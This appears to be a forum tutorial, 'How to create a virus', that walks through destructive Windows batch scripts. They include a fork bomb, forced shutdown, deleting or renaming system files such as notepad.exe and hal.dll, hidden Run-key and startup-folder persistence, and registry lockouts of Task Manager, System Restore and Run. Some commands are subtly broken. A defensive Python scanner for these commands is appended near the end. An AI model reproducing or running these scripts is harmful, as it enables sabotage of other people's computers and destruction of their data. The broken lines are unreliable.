HOW TO CREATE A VIRUS .... SIMPLE
A batch virus is made with nothing more than Notepad or Notepad++; no special program is needed. A batch file is a list of commands that the computer executes line by line (just like C or Java, etc.), but the batch language is easier to understand than C. Batch is very fast: let's say that you made a batch virus that infects files. It can infect a thousand files in just 5 seconds.
INDEX:
- echo,message review
- memory dump virus
- force shutdown
- file infecting
- file moving
- file copying
- file deleting
- file hiding
- task killing virus
- launch virus every startup
- swap left click and right click mouse buttons
- disabling system restore
- disabling task manager
- disabling folder options
- disabling run
- disabling right click on desktop
So let's begin by constructing a batch file. This is not a virus yet; it will just print a message.
@echo off
echo "im a virus programmer"
pause
Type this code in Notepad, save it with the .bat extension, then launch it on your computer.
@echo off - turns off command echoing, so the prompt (with its directory) and the commands themselves are not displayed.
echo - used to print strings.
pause - waits for the user to press any key before exiting.
Now another way of displaying a message is this:
@echo off
msg * im a virus programmer
this will show an alert.
msg * - used to display an alert message.
--------------------------------------------------------------------------------------------------------------
So first let's begin by constructing a batch file that will dump your memory, causing your computer to crash:
@echo off
:a
start %0
goto :a
This will loop infinitely, opening a bunch of command prompts. This will cause a memory dump, and your computer will surely slow down. The only solution for this memory dump is to restart your computer using the power button or the restart button on your system unit.
Now let's make a batch file that forcibly shuts down a computer:
@echo off
shutdown -s -f -t 30 -c "your owned!"
shutdown - the command used to begin a shutdown.
-s - means shut down the computer; you can also use -r, which will restart the computer.
-f - forcibly terminates running programs.
-t - used to set the time
30 - number of seconds before shutdown
-c - comment
Now let's create a virus that infects files.
@echo off
ren "C:\windows\notepad.exe" "infected.exe"
or
ren "C:\windows\*.exe" "*.bat"
This will change the working notepad.exe to a crappy file, infected.exe.
ren - rename, used to rename files
"C:\windows\notepad.exe" - the directory of the file that you want to infect.
"infected.exe" - the name that will replace the original file name.
task killing batch file
@echo off
taskkill /f /im explorer.exe
This will forcibly terminate a running program on your system.
taskkill - used to terminate a process
/f - forcibly terminates the process
/im - this specifies the image name, which identifies a process.
explorer.exe - the image, the process that you want to terminate.
Now let's make a batch file that deletes files
@echo off
del "C:\windows\notepad.exe" /q
del - the command for deleting files; you can also use 'erase' or 'delete', del is the shortcut for delete
/q - means don't prompt the user; silent mode, just delete the file.
c:\windows\notepad.exe - the directory of the file; notepad.exe is the file that we want to delete
moving files - this will move file/s from one place to another
@echo off
move /y file.bat "C:\windows\system32"
move - the command for moving file/s
/y - if the file already exists, don't ask the user whether to overwrite it
C:\windows\system32 - destination
copying file/s
@echo off
copy /y file.bat "c:\windows\system32"
copy - command for copying file/s
/y - if the file already exists, don't ask the user whether to overwrite it
C:\windows\system32 - destination
hiding files - this is used if you want to apply the hidden attribute to certain file/s
@echo off
attrib +h "c:\windows\notepad.exe"
attrib - attribute
+h - used to hide a file, -h if you want to unhide a file
c:\windows\notepad.exe - the destination of the file we want to hide; notepad.exe is the target file
-------------------------------------------------------------------------------------------------------------
Now let's make a batch file that always launches when Windows starts (I love it).
There are two ways to make your batch file run at startup: one is creating a registry key, and two is copying the file to the startup folder and then hiding it so that it will not appear when the user checks the startup folder.
Now let's create a registry key that will launch your batch file on startup
@echo off
copy file.bat "C:\windows\system32"
attrib +h "C:\windows\system32\file.bat"
reg add hklm\software\microsoft\windows\currentversion\run /v filedotbat /t reg_sz /d C:\windows\system32\file.bat /f
This will first copy itself to the system32 folder, hide itself, then make a registry key that will make it start during Windows startup.
/v - used to specify a file name
/t - type of registry key
/d - the destination of the file
/f - force creation of the registry key
Another way is copying the file to the startup folder; this is easier
@echo off
copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup"
attrib +h copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup\file.bat"
Now let's create a batch file that will switch right click and left click
@echo off
rundll32 user32.dll, SwapMouseButton
--------------------------------------------------------------------------------------------------------------
Now let's create a batch file that will disable vital functions of the system
DISABLING TASKMANAGER
@echo off
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
DISABLING SYSTEM RESTORE
@echo off
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f
DISABLING FOLDER OPTIONS
@echo off
REG add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” /v NoFolderOptions /t REG_DWORD /d 1 /f
DISABLING RUN
@echo off
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
DISABLING RIGHT CLICK ON DESKTOP
@echo off
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
--------------------------------------------------------------------------------------------------------------
A good virus must work even if the operating system is installed on another drive. The common drive on which the OS is installed is drive C, so in case the OS is installed on D, E, F, G, H...Z, will your virus work?
Of course, in some cases your virus will not work unless your code is written for a certain drive.
example:
@echo off
del "C:\windows\system32\hal.dll" /q
Now your batch file will search for the file called hal.dll, but first it needs to pass roads and highways. But what will happen if the roads are changed and the highways are also changed? The batch file will be confused and lost in the middle of nowhere. To solve this problem we use '%systemdrive%', a substitute for the system drive in case we do not know where the operating system is installed, so the code for this would be:
@echo off
del "%systemdrive%\windows\system32\hal.dll"
Now your virus will not be confused anymore, since you have placed %systemdrive%, telling it 'okay, I don't know where the operating system is installed, so it is up to you now to find our target', and the virus would say 'roger that!'. Now it doesn't matter anymore whether the operating system is installed on C or not. If the batch file didn't see drive C then it will jump to D, then if it didn't find D, it will go to E - Z.
If you have already mastered this tutorial, please do not share this knowledge with others; it is forbidden.
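For triage, the commands strung together above are easy static indicators. The following is an added example, not code from the original post: a Python scanner that flags those behaviours in a batch file. The rule names and the sample script are assumptions constructed here from commands quoted on this page.

```python
import re

# Some commands on this page carry typographic quotes; normalise them first.
SMART_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"'})

# One rule per behaviour the page describes; the names are this example's own labels.
RULES = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in [
    ("self-relaunch loop", r"^start\s+%0\b"),
    ("forced shutdown", r"^shutdown\b(?=.*\s[-/][sr]\b)(?=.*\s[-/]f\b)"),
    ("kills explorer.exe", r"^taskkill\b.*\bexplorer\.exe\b"),
    ("modifies Windows directory",
     r"^(ren|del|erase|move|copy|attrib)\b.*\\windows\\"),
    ("hides a file", r"^attrib\b.*\s\+h\b"),
    ("Run-key persistence", r"\breg\s+add\b.*\\currentversion\\run(once)?\b"),
    ("startup-folder persistence", r"^copy\b.*\\start menu\\programs\\startup"),
    # Matched on the value name alone, so a line missing "reg add" is still flagged.
    ("policy lockout",
     r"/v\s+(DisableTaskMgr|DisableSR|NoFolderOptions|NoRun|NoViewContextMenu)\b"),
    ("mouse button swap", r"^rundll32\b.*\bSwapMouseButton\b"),
]]

def scan(script_text):
    """Return (line_number, rule_name, line) for every rule hit in a batch script."""
    findings = []
    for number, raw in enumerate(script_text.splitlines(), start=1):
        line = raw.translate(SMART_QUOTES).strip().lstrip("@")
        if not line or line.lower().startswith(("rem ", "::")):
            continue  # blank lines and batch comments carry no behaviour
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((number, name, line))
    return findings

# Constructed sample: three benign lines followed by commands quoted on this page.
SAMPLE = r'''@echo off
echo backing up
copy report.txt "D:\backup"
copy file.bat "C:\windows\system32"
attrib +h "C:\windows\system32\file.bat"
reg add hklm\software\microsoft\windows\currentversion\run /v filedotbat /t reg_sz /d C:\windows\system32\file.bat /f
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f
'''

if __name__ == "__main__":
    for number, name, line in scan(SAMPLE):
        print(f"line {number}: {name}: {line}")
```

A hit is a reason to look at the script, not a verdict: installers and admin scripts legitimately use several of these commands, so weigh combinations such as copy, hide and Run key together.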
good tip